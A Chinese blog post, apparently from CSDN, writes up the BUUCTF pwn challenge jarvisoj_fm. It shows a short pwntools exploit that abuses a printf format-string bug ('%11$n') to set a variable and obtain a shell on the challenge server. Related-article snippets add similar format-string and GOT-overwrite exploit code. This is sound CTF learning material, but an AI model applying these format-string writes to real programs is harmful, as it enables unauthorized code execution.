pwn刷题num41---格式化字符串漏洞任意地址修改

最新推荐文章于 2024-06-17 12:15:46 发布
最新推荐文章于 2024-06-17 12:15:46 发布
阅读量629 收藏 3
点赞数
分类专栏: CTF BUUCTF pwn 文章标签: 安全 linux 系统安全 c语言 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tbsqigongzi/article/details/124543987
版权
pwn 同时被 3 个专栏收录
67 篇文章 5 订阅
订阅专栏
CTF
61 篇文章 1 订阅
订阅专栏
BUUCTF
36 篇文章 0 订阅
订阅专栏
本文详细介绍了如何分析一个32位程序的保护机制,包括RELRO、Canary、NX和PIE等,并展示了通过ida查看伪代码找到关键点。通过构造特定的payload利用printf格式化字符串漏洞修改变量x的值为4,从而获取shell。实验中使用了远程连接并交互以执行exploit脚本。
摘要由CSDN通过智能技术生成

BUUCTF-PWN-jarvisoj_fm

在这里插入图片描述
首先查保护–>看链接类型–>赋予程序可执行权限–>试运行在这里插入图片描述

32位程序,小端序
开启部分RELRO-----got表可写
开启canary保护-----栈溢出需要绕过canary
开启NX保护-----堆栈不可执行
未开启PIE-----程序地址为真实地址
动态链接

ida看伪代码
在这里插入图片描述
简单的代码,可知只要x=4就可获得shell

思路

用read函数输入一个字符串,之后printf格式化字符串漏洞实现任意地址修改,将x的值改为4
先找一下输入的buf是printf的第几个参数(第11个参数)
在这里插入图片描述

exp

from pwn import *
context(os = 'linux',endian = 'little',log_level = 'debug',arch = 'i386')
sh = remote('node4.buuoj.cn',26010)
x_addr = 0x804A02C
payload = flat([x_addr,'%11$n'])
sh.sendline(payload)
sh.interactive()

运行获得shell
在这里插入图片描述
在这里插入图片描述

tbsqigongzi
关注
专栏目录
BUUCTF-PWN刷题记录-18(格式化字符串漏洞
weixin_44145820的博客
05-08 1841
目录xman_2019_format(字符串位于堆上)hitcontraining_playfmt(字符串位于bss)wustctf2020_babyfmt xman_2019_format(字符串位于堆上) 一道格式化字符串题目,但是只有一次输入机会,但是有多次利用机会,每次利用使用‘|’隔开 我们先看一下栈的情况 经过多次调试,可以发现返回地址最低一个16进制位一定为0xC,我们只需要爆破倒数第二个16进制位就能得到指向返回地址的栈上地址 Exp: from pwn import * #r =
攻防世界格式化字符串漏洞greeting150
Rt1Text的博客
04-10 448
1.checksec+运行 32位/NX堆栈不可执行/Canary保护 注意一点:没有RELRO保护,got表完全可写 2.IDA常规操作 1.main函数 2.getnline函数 看到以上信息可以 泄露任意地址的内存 但是........上面的看着感觉不是很多对 原来是这样 出现了aaaa---->0x61616161,参数在格式化字符串第12个位置 aaaaaa%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,...
pwn刷题num26-----格式化字符串漏洞实现任意地址修改
tbsqigongzi的博客
04-27 493
BUUCTF-PWN-[第五空间2019 决赛]PWN5 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 开启canary保护-----栈溢出需绕过canary 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 程序运行后首先输入一个name 然后输入密码(passwd) 最后fail ida看一下伪代码 观察主函数,发现格式化字符串漏洞 printf(&buf);
字符串格式化漏洞修改GOT表一例
Carrot_kexin的博客
10-17 982
代码如下: from pwn import * context(arch='amd64', os='linux') elf = ELF("./pwn") io = remote("111.200.241.244", 56315) catflag_addr = 0x4008DA puts_got = elf.got['puts'] payload = fmtstr_payload(6, {puts_got: catflag_addr}) io.recvuntil("3. Exit the battle") i
CTF PWN 格式化字符串
VisualNull的博客
06-05 1304
CTF PWN格式化字符串
格式字符串漏洞任意地址覆盖大数字
Gtooler的博客
10-13 3073
格式化字符串漏洞覆盖大数字时,如果选择一次性输出大数字个字节来进行覆盖,会很久很久,或者直接报错中断,所以来搞个攻防世界高手区的题目来总结一下 pwn高手区,实时数据监测这道题,就是格式化字符串漏洞覆盖大数字 题目运行时会直接告诉你key的地址,我们只需要利用imagemagic中的printf利用格式化字符串漏洞来覆盖就行了,但就像刚才说的,直接覆盖时间太久了而且会报错,所以可以想想别的办法 如果我们想覆盖key为0x02223322,那么根据小端存储,在内存中就是\x22 \x33 \x22 \x0
Unnormalize_Input_String 未标准化的输入字符串,指外来的字符串型数据未做标准化处理。
SMITHKANG的博客
07-02 1252
转载自:https://my.oschina.net/u/3100849/blog/863746 Unnormalize_Input_String 未标准化的输入字符串,指外来的字符串型数据未做标准化处理。 此标准化处理是将字符串的实际存储转换为Unicode编码,主要作用是提高字符串查询搜索的性能。 修复建议 进行字符串标准化处理。 修复示例 如: public void Unnormal...
攻防世界greeting-150——进阶格式化字符串
weixin_48066554的博客
05-21 567
水题也能学东西阿,小孩子不懂事,做着玩的
printf格式化字符串漏洞原理解析
liucc09的博客
11-25 6158
任意地址 printf("%x")只给格式化字符串,而不给参数,会导致内存泄漏从而读到内存中其他地址的数据。 %N$x参数可以以16进制方式打印第N个参数的内容,通过修改N,我们可以遍历栈上的所有内容。 通过%N$s参数,我们可以将第N个参数对应的内容作为字符串地址从而获得内存中任意位置的内容。方法如下 如果我们使用的打印语句为:printf("AAAA%x")那么栈的内容如下: 栈底 … x % A A A A … 栈顶 使用printf("A
格式化字符串
m0_49959202的博客
10-29 803
文章目录格式化字符串1.原理1.1 格式化字符串介绍1.1.1 格式化字符串函数1.1.2 格式化字符串1.1.3 参数1.2 32位格式化字符串漏洞基本原理1.3 32位格式化字符串利用思路1.3.1 利用1:程序崩溃1.3.2 利用2:泄露内存1.3.2.1 泄露栈内存1.3.2.1.1 获取栈变量数值1.3.2.1.2 获取栈变量对应字符串1.3.2.2 泄露任意地址内存1.3.3 利用3:覆盖内存1.3.3.1 覆盖栈内存1.3.3.2 覆盖任意地址内存1.3.3.2.1 覆盖为小数字1.3.3.3
ISCC之pwn1格式化字符串漏洞详解!
BadRer的博客
05-29 3498
作为小白的我,自从入了ctf的坑就再也没爬起来过,从无到有实在是很辛苦。仅以此片纪念我的青春。   直接进入正题。这是个很明显的32位的格式化字符串漏洞。 上手就先leak出libc地址,求偏移得到system地址,(我也忘了有没有给lib库,反正我是在本地调试,拿自己的lib库。Ps:在本地可以通过./libc.so.6或者ldd --version 查看libc的版本号,作为新手还是
栈迁移之任意地址写(pwn入门)
最新发布
2402_83422357的博客
06-17 825
很多时候,程序给的溢出空间不够,仅仅只能溢出到rbp,或者是返回地址,这个时候去构造rop链条打程序就行不通了,没有多余的空间给你去构造rop链条,那么我们可以使用栈迁移的技术,先在一个位置布置好rop链条,然后把程序的执行流迁移到我们布置好rop链条的位置,让程序执行流执行踏入我们布置好了的地方,就相当于之前的那种构造rop链条的手段,但是多了一个迁移栈步骤,这个下一篇博客会细讲现在就是讲下最基础的利用栈迁移实现任意地址写,也就是可以改写变量的值这里的关键一就是rbp指令,
pwn学习】格式化字符漏洞
Morphy_Amo的博客
12-29 6275
文章目录什么是格式化字符漏洞格式化字符串函数格式化字符串利用泄露内存例题 利用格式化字符串漏洞获取libc基址覆盖内存栈地址覆盖小数覆盖大数覆盖轮子 什么是格式化字符漏洞 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计算机内存中表示的数据转化为我们人类可读的字符串格式。几乎所有的 C/C++ 程序都会利用格式化字符串函数来输出信息,调试程序,或者处理字符串。一般来说,格式化字符串在利用的时候主要分为三个部分。 格式化字符串
2019全国大学生信息安全竞赛pwn[数组越界任意写,doublefree,ret2dl-resolve]
九层台
04-25 1820
0x01your_pwn Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 保护全开的栈地址任意写 v4的索引是可以输入的,也会输出v4数组的内容。比较麻烦的是每次只能读写一...
pwn-格式化字符串漏洞
苗_的博客
09-07 935
一直想写一篇关于这个漏洞的博客,刚好借着今天刷到buu的【第五空间决赛2019】PWN5这道题来系统讲一下格式化字符串漏洞: (这里这道题还是蛮简单的,主要是去理解这个漏洞的原理,关于该漏洞的难度稍大的题会零开博客讲解) 看一下几个经常用来测试格式化字符串的格式控制符%d 用于读取10进制数值 %x 用于读取16进制数值 (这两个都可以起到泄露信息的作用)%s 用于读取字符串值  即泄露任意地址信息 (%d,%x只能泄露原有栈的内容,结合%s就可以泄露任意地址的内容) (%s不直接打印栈中内容,而是通过.
PWN学习总结
windy_ll的博客
12-26 2098
一、栈溢出原理     什么是栈溢出?栈溢出就是缓冲区溢出的一种。 由于缓冲区溢出而使得有用的存储单元被改写,往往会引发不可预料的后果。程序在运行过程中,为了临时存取数据的需要,一般都要分配一些内存空间,通常称这些空间为缓冲区。如果向缓冲区中写入超过其本身长度的数据,以致于缓冲区无法容纳,就会造成缓冲区以外的存储单元被改写,这种现象就称为缓冲区溢出。缓冲区长度一般与用户自己定义的缓冲变量的类型有关。(PS:摘自百度百科)     简单来说,就是程序没有检查用户输入的数据长度,导致攻击者覆盖栈上不是程序希望写
软件安全实验——lab4(格式化字符串2:修改内存地址运行shellcode获取root权限)
Onlyone_1314的博客
07-21 1148
目录标题一、获得环境变量的程序和攻击的程序的文件名长度不一样(1)定义一个环境变量EGG存放shellcode(2)获取shellcode的地址(3)查找exit函数的地址(4)1、用%x找到printf()中参数在栈中的位置是11(5)将exit函数的地址修改为shellcode的地址二、令两个程序的文件名长度相等(推荐)(1)定义一个环境变量EGG存放shellcode(2)获取shellcode的地址(3)攻击三、Root权限开启alsr:sudo sysctl -w kernel.randomize
Pwn_11 Got 劫持
weixin_30822451的博客
03-08 458
比如说 把puts(str)的.got.plt的地址的值改为system函数地址 格式化字符串的综合利用 可以使用任意地址读取,获取当前函数的实际地址,从而可以获得libc的基地址 利用libc基地址+偏移地址 可以知道其他函数地址 利用任意地址写入,从而配合got hijacking更改已有函数地址   from pwn import *r = remote('127.0....
32位格式化字符串漏洞实现任意地址内存覆盖
z2876563的博客
08-11 1169
32位格式化字符串漏洞实现任意地址内存覆盖 原理 int i; printf("AAAA%n",&i) 此时i=4 漏洞利用例子 比如想将2写入0xffffcd28。则构造payload"AA%15nA"+p32(0xffffcd28),开头AA即可将=地址0xffffcd28内容赋值为2,nA"+p32(0xffffcd28),开头AA即可将=地址0xffffcd28内容赋值为2,%15nA"+p32(0xffffcd28),开头AA即可将=地址0xffffcd28内容赋值为2,n5个字节,为了
pwn格式化字符串漏洞
08-30
pwn中的格式化字符串漏洞是指通过向程序输入格式化字符串,然后利用程序内部的输出函数来读取或修改内存中的数据。这种漏洞会导致程序的安全性受到威胁,攻击者可以利用该漏洞执行任意代码或者获取敏感信息。 格式...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值